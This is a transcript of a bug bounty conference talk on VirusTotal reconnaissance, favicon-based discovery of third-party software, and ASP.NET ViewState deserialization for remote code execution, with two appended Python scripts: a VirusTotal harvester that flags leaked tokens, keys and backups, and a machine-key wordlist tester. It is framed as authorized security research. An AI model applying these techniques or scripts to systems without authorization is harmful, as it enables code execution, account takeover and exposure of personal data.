
So this is the talk we were all waiting for. We have Godfather Orwa. He doesn't need any introduction: one of the top hackers on mostly all the bug bounty platforms. So, yeah, the talk is all about reconnaissance and using VirusTotal. So let's get started with them. Take this.

Hi everyone. Okay, this is Orwa Godfather and our topic today is going to be a little bit interesting. So I want to see a lot of hands: who do we have here doing bug bounty? Let me see some hands. Oh, okay. So our topic today can help any bug hunter, and it can help any customer or anyone working
in cyber security. So the topic title today, as we can see on the title, is the art of VirusTotal hacking, but I made a little change. Yeah, it's okay. I made a little change to make it the art of real hacking, and VirusTotal is just a topic from the full topic. To introduce myself: I'm working as a full-time bug hunter under the username Orwa Godfather. Full-time bug bounty hunter, security researcher, content creator on Bugcrowd, very good collaborator, in the top 50 on Bugcrowd and number 23 in P1 for reporting critical bugs on Bugcrowd, more than 1,000 bugs submitted, high and critical, more than 15 zero days I discovered, and CVEs. I'm a traveler, gamer and cook.
So the topic today is the art of VirusTotal hacking. That's the first one; the second one is zero-day hacking, and the last one is the machine key and ViewState deserialization vulnerability. Are you ready again? Are you ready? Yeah. Let's start.

Okay, VirusTotal hacking. After this topic we can know, for any target you want to hunt on, or if you want to secure our company, for any subdomain or any app: IPs and origin IPs, at the same time unique endpoints no one can find in other resources, unique subdomains and open ports at the same time, credentials in some cases (clear-text credentials and
sometimes base64 credentials) and tokens as well. So I think everyone here knows what VirusTotal is, but let's give a quick short about VirusTotal. VirusTotal is a popular online service that analyzes files and URLs for potential viruses, malware and other threats. So VirusTotal inspects items with more than 70 antivirus scanners and URL/domain blocklisting services in some cases, and to be honest I don't know how some websites' or most websites' endpoints and internal endpoints and IPs get archived on VirusTotal; maybe via user submission, automated crawling, analysis reports, and there are other ways. Anyone who uses VirusTotal knows the usual method that we can see here, or we can see here like
live. So anyone who wants to scan his app chooses a file, uploads a file, no matter what the file is (an exe file, a DLL file, any file), and from that file he starts checking if there are any viruses, any threats, and at the same time checking the endpoints, everything inside that file. Now, last year when I was here I talked about a perfect, cool tool for gathering endpoints. This tool is called waymore. This tool is perfect. It gathers endpoints, as you can see, from web archive, from Common Crawl, from AlienVault, from URLScan, and there was a little update that gathers endpoints from VirusTotal, as you can see here. But when I tried to use
it, I followed the logs and I found that it's not getting endpoints from VirusTotal because there is a very hard limit on the API calls. So I started using that manually.
So today I'm going to present here the method and all the examples, and I'm going to drop today an old topic, a real scenario, examples, a real target, and at the end I'm going to share with you a private script to gather endpoints from VirusTotal. So, discovering: you have to create an account on VirusTotal as a start, then get an API key, then we can use this endpoint. In the endpoint we add to the apikey value the API key and to the domain value the domain, and it should be the specific domain with subdomain, and we have here an
example. So what can we get from using just this URL in the browser? First thing, subdomains, and at the same time unique subdomains. Second thing, IPs, and mostly origin IPs. Endpoints: these endpoints include, in a lot of cases, credentials that got archived, or tokens for account activation, reset password, or getting unauthorized access to the panel. Here is an example of fixed credentials, like for an Okta service. Here's the example, and in some cases you can find the credentials like this but in base64; you have to encode it. Now, a scenario of P1 and P2 bugs, meaning high and critical bugs, that you can get from using just VirusTotal: information disclosure endpoints. Now a lot of people
miss, when gathering endpoints, the specific extensions JPG and PNG and picture extensions; they remove them from gathering the endpoints. But if you're working on a functional web app or anything like banks, these extensions are important, because in a lot of cases they can give you access to check-in JPG or picture extension files, or invoices, or important PII as well. Information disclosure endpoints for virtual cards, gift cards, for in-store services like Starbucks, like Uber, all of these services: you can get in some cases voucher cards and gift cards, and that's something that can be reported. Information disclosure endpoints: the txt file, the XML file, the PHP
file, you know, all of this: users and passwords or emails, endpoints, clear-text or encoded tokens, API keys that can lead to account takeover or unauthorized access, or if you have a panel that doesn't have a function to create an account, with some specific endpoint you can get access to create an account on that panel. Backup files, and that's so, so important on VirusTotal, such as, for example, ISO, exe files, 7z, tar, gz, DLL as well. Unauthorized access via unique open ports. You can sometimes find origin IPs more than from any other resource. So you know me, or most of you know me: in recon for endpoints or for IPs I try everything, everything, but the
last thing I found had like a unique resource, and a very interesting source: it was VirusTotal, for endpoints and for origin IPs. When we start looking for endpoints manually, or if we use the script that I'm going to share, we have to start searching those endpoints. So here are a few quick keywords that can help you find specific things. For backup files, as you can see: 7z, exe, gz and a lot of other extensions for backup files. You can search for token= or api_key= or /resetpassword/ or reset-password, or a registration endpoint. We can search directly for ==; that means something like a token or base64-encoded
data. We can search for a colon to check open ports. We can search for @ to find an email directly, and beside the email we can find the password. We can search for code=. We can search for file extensions; that's important as well, like ASPX, ASHX, PHP, JSP, CGI, XML, all of this stuff. The important tip in VirusTotal: if we have uat-dev, it can give us different results from uat1-dev. So you have to check all subdomains one by one. Here's the script that I'm going to share. It was very hard to create a script gathering endpoints. So I used Tess Arman to help me with that, and big thanks to him for helping me with this
script. The script here, as you can see, is easy to use. Installation: then you have to create three accounts with three API keys, then add those three API keys to this file, and here we have an example for
that, and then we can run it on the subdomains file and print the output, and then we can filter that by using egrep. And after that we already have a list of amazing endpoints. Let me change it now to public. And this is the first one.
No, I think I will do it later. I didn't add the full password. Yeah. Okay, I will do it after that. Mistakes happen. Yeah, but I'm sure I will change it to public.
It's because of you, Arman. You keep telling me don't post it, don't post it. This is captured when you run it on a subdomains list. It takes a little bit of time, but in the end it gives you good results. So it gives you three subdomains' endpoints per minute. That means 180 subdomains per hour. So this script generates three subdomains per minute, 180 subdomains per hour. And here's an example video of the script when it's
running. Here's an example of endpoints.
And don't worry, it's a public target and I got authorization to post
that. And here are examples of some critical reports from
using VirusTotal. You can see the VirusTotal endpoint in the report and the bounty at the same time. The second one was access to identity cards, passports and a lot of other sensitive files, and at the same time, by VirusTotal, this bug was so interesting, because for this endpoint, as you can see it in the VirusTotal page, CNSOP2, this domain: I tried to find any endpoint for this app and it showed nothing; it kept redirecting to SSO or Microsoft. I tried Bing, I tried dorks, I tried waybackurls, web archive, AlienVault, who else, a lot of other resources, and didn't get a single endpoint, even with
fuzzing. But in VirusTotal I directly found this endpoint, and with the same bug, at the same time, I directly got a DLL file, analyzed it, then I started code review and I found a lot of sensitive stuff, and I even found some bugs on this endpoint because I got a live endpoint. Here are some other examples of using VirusTotal and how it can lead you to find bugs: like, I found a specific endpoint from VirusTotal, then I went after that endpoint and I got a backup file; inside that backup file some sensitive stuff, including a machine key (we will talk about that later) and how I got RCE from that. A VirusTotal endpoint, then normal fuzzing,
then I found Spring Boot Actuator, then a heapdump file, and it's P1 for sure. A VirusTotal endpoint, then a VirusTotal button, then I tested that button and I found local file inclusion. A reset-password VirusTotal code for reset password, and I got account takeover. Now let's start with zero-day hacking.
A zero day is a vulnerability in software or hardware that's typically unknown to the vendor and for which no patch or other fix is available. Let's try to talk about zero days more easily. Some service: a company sells a service to a lot of other companies. If someone finds a bug in this service, it can affect all companies, and that's what's called a zero day. It can happen in software, it can happen in hardware or a specific product. But we will talk today about software: installed apps or third parties. Now, third parties: there's a huge number of third parties selling services to companies. Here's the example:
mostly the third party has the domain and the company has the subdomain name, and in other cases it can be the third-party name as a subdomain and the company name as the domain, and we have here an example of a third party, the Okta service, now Grog.io, and the other example of a third party as a subdomain. Now, to get a zero day, what should we do? We should first find the software or installed app or third party. The next thing, we have to start recon on that software or installed app or third party, and forget our target. Then we have to find a bug in the software or that installed app or that
third party. Someone looks at that like it's a hard thing, but it's the easy thing; the hard thing is finding the software itself. You have to test the same bug on more than two companies or three companies, and if you get a valid bug, then at this time you have a zero day, or a one day if no one got a CVE for that. A quick way: I talked a lot about how to find third parties, but here's a quick way to find, like, if we see a company, BMW, and we want BMW as a subdomain, and we want to know all the companies after that, and mostly they're third parties, so we use the dash to clear the results that
I don't want to see, and in this case we have the other results. And there are other examples I wrote down; we can use this as well, like if we can see here BMW star, but now BMW*, it gives us other results and other third
parties. Now I talked, and this is a slide from my last talk here last year, about how, if you're doing recon on some specific company, to get all the favicons for this company by using FOFA. So we have a dork for the company, then we can start picking up the icons, and now we have the favicons. Now we are going to recon for favicons, not for the company. As we can see here, all of these favicons are for the same company. All of you know, I think, this company. The main favicon is the first one. The second one is different and the third one is different, and after that is different, and the last one is
different. Now that means on this app there is software installed, or it's a third party, or some product running on this app. Now we have to know that; we have to know what the favicon for this software is, and we have to know what this software is. At the same time we can start locating the favicon by running an httpx command: -path /favicon.ico and print the results with -mc 200 and the output at the same time. Now there is a tip here. Not all favicons are stored in the source as favicon.ico. So we have to view the source and search for the extension .ico or search
for the extension favicon. Now we found the favicon endpoint. What do you do after that? Now there are a lot of methods, a lot of tools, but the favorite one for me is to check the favicon on this domain, f icon-km.uk. Why? Because from here, when you search for a favicon, we can get two things: the favicon hash and the MD5. The MD5 helps us in something and the favicon hash in the other thing. Here's a real example of installed software. We can read up there the name of the software; it's Fraud Sites or something like that. The next thing, we check the favicon, and as you can see we have this
favicon hash and we have this MD5. What should we do after that? Now in Censys we can use this dork for the MD5, because we can't search for the favicon hash in Censys. So here's the dork, and as you can see here are the results for the same software. In Shodan we can take the favicon hash, and the dork is http.favicon.hash, and as you can see, at the same time we have 324 results for the same software. There is ZoomEye as well. It gives perfect results, and the dork for this one is iconhash; just paste the icon hash. Now we know what the software is
or the third party. What can we do after that to start testing? So the first thing: if the program or software is running with a strong WAF, we can, by using this method, run the same software or the same app on a different IP or a different thing without a WAF, or we can install this app locally and test without a WAF. At the same time, if we have a target and we didn't find any endpoint, even on VirusTotal or anything, we can start looking for other targets that use this software and look for endpoints of those targets and try them on our
target. Also, what we can do to test: I already talked about authentication bypass via cross-subdomain cookies and authentication bypass by bypassing registration, so all of these bugs happened with us on a zero day the same way, by the same method. What else can we do to test? We can start searching for backup files for the software itself. Then download and install the software. Try to look for the software source on GitHub or GitLab or other resources, and maybe we can get lucky by finding a perfect endpoint to test to get unauthorized access, or default credentials, or some API calls, or a machine key in ASP.NET. And from here let's start with the
easy topic, easy to understand, about the machine key and how to exploit the machine key in ViewState deserialization. Machine key and ViewState
deserialization. In this topic I'm going to share what the ViewState and the machine key are, how to find the ViewState and how to find the machine key, test cases, a ready extension to find and test the ViewState, tools and a machine key wordlist (a private wordlist of machine keys) to test the ViewState, and an example of a zero day. So, as you can see, the ViewState is a method that the ASP.NET framework uses by default to preserve page and control values between web pages, and mostly it comes encoded. And the machine key is a class that provides methods to expose the hashing and encryption logic in ASP.NET. The machine key is used for a lot of
stuff, but the important one that we are going to use here is about the ViewState encryption and
validation. In ViewState calls there are machine keys identifying these calls. So if we know the machine key for the ViewState, then we can generate a serialized payload and get RCE, and that's the deserialization vulnerability. Machine key and ViewState deserialization hacking: how to find the ViewState? The first thing: in ASP.NET endpoints calling the server, such as ASP, ASPX, ASHX. Now, how to find the machine keys? If we can access the web.config file normally, or if we can access the web.config file via a local file inclusion bug, or via a machine key wordlist, or via downloading the software, and I talked about that in zero-day discovering: try to
find the software source and install the software. In some cases, you can find a machine key and then you can get the RC for all the product that use it. Here's the examples for view state. This is the first one, view state value. Here's another example. And here's another example. Now test cases for the view state des serialization. There is two test. First one if the MAC is not enabled and here we can start exploiting directly without need for machine key. But if the MAC is enabled here, we have to get the machine key. And in this case, we can start testing this machine keyword list or try to download the software as I said now and looking for
machine key in the web config file. Here's a ready extension and it's amazing extension. It's called a view state editor. Now let's see how the result it came with this extension when you use it. on a asbnet target when you intercept the request or back to your history there is a view state as you can see now it show the MAC is enabled now MAC is enabled here we have to get the machine key here's another example if you can see like this it's Mac is not enabled you can start directly exploit that via yeso serial
tools and machine keys word list to test the view state. First one uh the ASP.NET worker and this tool to test the machine key in a view state. Yes serial I think most of you know it this tool to generate a serialized payload. So the tip here if the MAC is not enabled you can uh is in yeah is enabled you can skip the first tool and start directly exploit via your serial. And the important tip in the same app different endpoint for ASPX endpoint you have to test all this endpoint not just a single one because uh the value of a view state keep change it from ASPX file to other one on the
same app, and it's very helpful in bypass cases as well. Now, if the MAC is not enabled, simply you can generate the serialized payload via ysoserial and send it in a POST request to perform RCE, and here's already an example: the username command, ysoserial.exe -o base64 and all of this stuff. And the next step, we can copy the payload from this command. Then replace it in the ViewState parameter value as a POST request. Then send the request to your Burp or server, and the response comes to your collaborator. It's like that. Now, if the MAC is enabled, you can download this tool. I'm going to change it to public after we're
done, for sure. In this tool we can find machine keys, edit machine keys, because I added some machine keys, and it's a gift for you. And then after installing this tool, we can run this command. We can replace the ViewState with the ViewState parameter value in the source of the app and replace the ViewState generator with the ViewState generator value. And here, yeah, let me go back to the value to let you see it. Yeah, here's an example of a ViewState generator value. It's 7, A, capital F, 1,
AD. Here we have an example video when we run this tool to test the machine key. Here we have the ViewState value and the ViewState
generator. I'm going to fast forward a little bit.
Yeah. And now it's ready to go.
As you can see here, it shows the key not found. In this case we have to get the right machine key. But if it shows the key is found, then we can directly start
exploiting. Here's an example. When it gets key found, we have the decryption key and the validation
key; the most important for us from here, I just highlighted it, is the validation key. That's what we are going to use in the ysoserial command. Then the next step, we copy the validation key, and the full command is going to be like as you can see: replace the ViewState generator, as I told you, with the parameter value, replace the key type with what you got, and replace the validation key with the validation key value. And here's a ready command to exploit with the username as well. And yeah, just like before, the first thing we copy the ready payload, we drop it in the ViewState parameter value and we send it as a POST
request. From all the topics that we talked about today, a very perfect zero day that we found: we found the software by checking and looking for the favicon hash, then we found a software source backup via VirusTotal. Now we installed that software. We started code review and we found the web.config file ready with a machine key. Then we tested that machine key on all the customers that use that product and we got RCE on all those customers. And here's an example of bounties on just one customer. And yeah, this is the end of my presentation. I hope you like it. And if you have any question, even my password, if you know it now.
No question then. It's perfect. Even you can ask me, will you come to me, or is there one who wants to
ask? I don't have a question; can you show us your bookmarks? Maybe next year I will open my profile for you and I'll start moving you from report to report. Yeah. So, thank you all, and I hope you enjoyed the talk today.
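The VirusTotal domain lookup the speaker walks through (paste the v2 domain report URL with the apikey and domain values, pull subdomains, resolved IPs and archived URLs out of the response, then egrep the URLs for the keywords he lists) as an added worked example in Python. This is not the speaker's private script. The v2 JSON field names (subdomains, resolutions[].ip_address, detected_urls[].url, undetected_urls[][0]) are assumed from the legacy API and should be checked against a live response, the sample report is constructed, and the keyword regexes are one reading of the list given in the talk.

```python
"""Harvest subdomains, resolved IPs and archived URLs from a VirusTotal v2
domain report, then bucket the URLs by the keyword classes worth grepping for.
Only fetch_domain_report() touches the network; everything else runs on the
constructed sample at the bottom. The v2 response layout used here is an
assumption about the legacy /domain/report endpoint, not a verified spec."""
import itertools
import json
import re
import urllib.parse
import urllib.request

V2_DOMAIN_REPORT = "https://www.virustotal.com/vtapi/v2/domain/report"

# One regex per keyword class from the talk: backup/binary artifacts, secrets
# in query strings, account-flow paths, base64 padding, host:port, e-mail
# addresses and server-side extensions.
PATTERNS = {
    "backup": re.compile(r"\.(zip|7z|rar|tar|gz|tgz|bak|iso|exe|dll|sql)(\?|$)", re.I),
    "secret": re.compile(r"(token|api[_-]?key|apikey|password|secret|code)=", re.I),
    "account": re.compile(r"/(reset[_-]?password|registration|register|activate)", re.I),
    "base64": re.compile(r"[A-Za-z0-9+/]{16,}={1,2}"),
    "port": re.compile(r"^https?://[^/]+:\d{2,5}", re.I),
    "email": re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+"),
    "server_side": re.compile(r"\.(aspx|ashx|asmx|php|jsp|cgi|xml|txt|config)(\?|$)", re.I),
}

def build_report_url(apikey: str, domain: str) -> str:
    """The URL the talk pastes into the browser: endpoint + apikey + domain."""
    return V2_DOMAIN_REPORT + "?" + urllib.parse.urlencode({"apikey": apikey, "domain": domain})

def fetch_domain_report(apikey: str, domain: str, timeout: int = 30):
    """Live lookup (not exercised offline). A 204 is the public-API rate-limit
    answer; return None so the caller can rotate to the next key and retry."""
    req = urllib.request.Request(build_report_url(apikey, domain),
                                 headers={"User-Agent": "vt-recon-example"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        if resp.status != 200:
            return None
        return json.load(resp)

def key_rotator(keys):
    """Round-robin over several free-tier keys: the talk's three-account trick."""
    return itertools.cycle(keys)

def extract_assets(report: dict) -> dict:
    """Subdomains, resolved (often origin) IPs and every archived URL in a report."""
    subdomains = sorted(set(report.get("subdomains", [])))
    ips = sorted({r["ip_address"] for r in report.get("resolutions", []) if "ip_address" in r})
    urls = [u["url"] for u in report.get("detected_urls", []) if isinstance(u, dict) and "url" in u]
    # undetected_urls entries are lists with the URL first (assumed v2 layout).
    urls += [u[0] for u in report.get("undetected_urls", []) if isinstance(u, list) and u]
    return {"subdomains": subdomains, "ips": ips, "urls": sorted(set(urls))}

def flag_interesting(urls) -> dict:
    """The egrep step: keyword class -> matching URLs, empty classes dropped."""
    hits = {name: [u for u in urls if pat.search(u)] for name, pat in PATTERNS.items()}
    return {name: found for name, found in hits.items() if found}

def harvest(domains, keys):
    """Live driver: one report per host, rotating keys. uat-dev and uat1-dev
    are looked up separately because VirusTotal answers per exact host."""
    rotor = key_rotator(keys)
    assets = {"subdomains": set(), "ips": set(), "urls": set()}
    for domain in domains:
        report = fetch_domain_report(next(rotor), domain)
        if report:
            for k, v in extract_assets(report).items():
                assets[k].update(v)
    return {k: sorted(v) for k, v in assets.items()}

# Constructed sample report (not real VirusTotal data) in the assumed v2 shape.
SAMPLE_REPORT = {
    "subdomains": ["uat-dev.example.com", "uat1-dev.example.com", "api.example.com"],
    "resolutions": [
        {"last_resolved": "2023-01-01 00:00:00", "ip_address": "203.0.113.10"},
        {"last_resolved": "2022-06-01 00:00:00", "ip_address": "203.0.113.11"},
    ],
    "detected_urls": [
        {"url": "https://api.example.com/v1/users?api_key=abcd1234", "positives": 1, "total": 70},
    ],
    "undetected_urls": [
        ["https://uat-dev.example.com/backup/site.7z", "h", 0, 70, "2023-01-01 00:00:00"],
        ["https://uat-dev.example.com/reset-password/?token=ZWFzeXRva2VuZm9ydGVzdA==", "h", 0, 70, "2023-01-01 00:00:00"],
        ["https://uat1-dev.example.com:8443/admin/login.aspx", "h", 0, 70, "2023-01-01 00:00:00"],
        ["https://uat1-dev.example.com/static/logo.png", "h", 0, 70, "2023-01-01 00:00:00"],
    ],
}

if __name__ == "__main__":
    found = extract_assets(SAMPLE_REPORT)
    print(json.dumps(found, indent=2))
    print(json.dumps(flag_interesting(found["urls"]), indent=2))
```

Run as a script it prints the assets and the keyword buckets for the sample; against a real programme, feed harvest() the subdomain list and the API keys, and keep the raw URL list too, since the image extensions the talk warns about dropping are deliberately not filtered out here.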
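The MAC-enabled ViewState case from the last part of the talk (run a wordlist of machine keys against a captured __VIEWSTATE and __VIEWSTATEGENERATOR before reaching for ysoserial) as an added example in Python. It is not the speaker's tool and ships no real keys. It assumes the legacy ASP.NET MAC construction: an HMAC under the validation key over the serialized page state followed by the generator value as a 4-byte little-endian integer, with no ViewStateUserKey and no ViewState encryption; the keys, the page state and the generator in the sample are all constructed.

```python
"""Test a machine-key wordlist against a captured ASP.NET __VIEWSTATE.

Assumed MAC construction (the legacy scheme: .NET 2.0-4.0, or 4.5+ with the
machineKey compatibilityMode setting): MAC = HMAC-<alg>(validationKey,
data || modifier), where modifier is __VIEWSTATEGENERATOR as a 4-byte
little-endian integer (a configured ViewStateUserKey would be appended after
it and is not handled here). The MAC is the trailing digest-length bytes of
the base64-decoded ViewState. Encrypted ViewStates and the non-legacy .NET
4.5 purpose-based key derivation are out of scope for this check."""
import base64
import hashlib
import hmac
import struct

# machineKey validation="..." names mapped to digest constructors.
DIGESTS = {
    "SHA1": hashlib.sha1,
    "HMACSHA256": hashlib.sha256,
    "HMACSHA384": hashlib.sha384,
    "HMACSHA512": hashlib.sha512,
}

def generator_modifier(generator_hex: str) -> bytes:
    """__VIEWSTATEGENERATOR is a uint32 printed as 8 hex digits (the talk's
    '7AF1AD..' value); the MAC modifier is its little-endian byte form."""
    return struct.pack("<I", int(generator_hex, 16))

def compute_mac(validation_key: bytes, data: bytes, generator_hex: str, alg: str = "SHA1") -> bytes:
    return hmac.new(validation_key, data + generator_modifier(generator_hex), DIGESTS[alg]).digest()

def split_viewstate(viewstate_b64: str, alg: str = "SHA1"):
    """Separate serialized page state from its MAC. An unencrypted
    ObjectStateFormatter blob starts with FF 01; anything else is encrypted
    or not a ViewState at all, and this wordlist check does not apply."""
    raw = base64.b64decode(viewstate_b64)
    mac_len = DIGESTS[alg]().digest_size
    if raw[:2] != b"\xff\x01" or len(raw) <= mac_len:
        raise ValueError("not an unencrypted ObjectStateFormatter ViewState")
    return raw[:-mac_len], raw[-mac_len:]

def find_validation_key(viewstate_b64: str, generator_hex: str, candidates, alg: str = "SHA1"):
    """Return the first hex validation key whose MAC matches, else None.
    A hit means the server's validationKey is in the wordlist, so a ViewState
    payload signed with it (the ysoserial step) will pass MAC validation."""
    data, mac = split_viewstate(viewstate_b64, alg)
    for hex_key in candidates:
        candidate = compute_mac(bytes.fromhex(hex_key), data, generator_hex, alg)
        if hmac.compare_digest(candidate, mac):
            return hex_key
    return None

def sign_viewstate(validation_key: bytes, data: bytes, generator_hex: str, alg: str = "SHA1") -> str:
    """Append a MAC to serialized page state (used below to build the sample)."""
    return base64.b64encode(data + compute_mac(validation_key, data, generator_hex, alg)).decode()

# Constructed sample: three made-up keys (not real leaked keys), a fake
# ObjectStateFormatter body that is not parseable page state, and a generator
# value in the same 8-hex-digit format the talk shows.
WORDLIST = ["11" * 32, "22" * 32, "3C2B1A09" * 8]
SAMPLE_GENERATOR = "7AF1AD00"
SAMPLE_DATA = b"\xff\x01\x0f\x05\x02\x05\x01\x05\x0bHelloWorld"
SAMPLE_VIEWSTATE = sign_viewstate(bytes.fromhex(WORDLIST[2]), SAMPLE_DATA, SAMPLE_GENERATOR)

if __name__ == "__main__":
    print("generator modifier:", generator_modifier(SAMPLE_GENERATOR).hex())
    print("matched key:", find_validation_key(SAMPLE_VIEWSTATE, SAMPLE_GENERATOR, WORDLIST))
    print("wrong generator:", find_validation_key(SAMPLE_VIEWSTATE, "00000000", WORDLIST))
```

Against a live target the two inputs come straight from the hidden fields of the intercepted request, and the generator matters: the same key tested with another page's __VIEWSTATEGENERATOR will not match, which is one reason the talk insists on checking each ASPX endpoint separately. A hit is then passed to ysoserial.net's ViewState plugin as --validationkey together with --validationalg and --generator set to the same values; a miss against the wordlist means the key has to come from web.config, a backup or the installed product, as the talk describes.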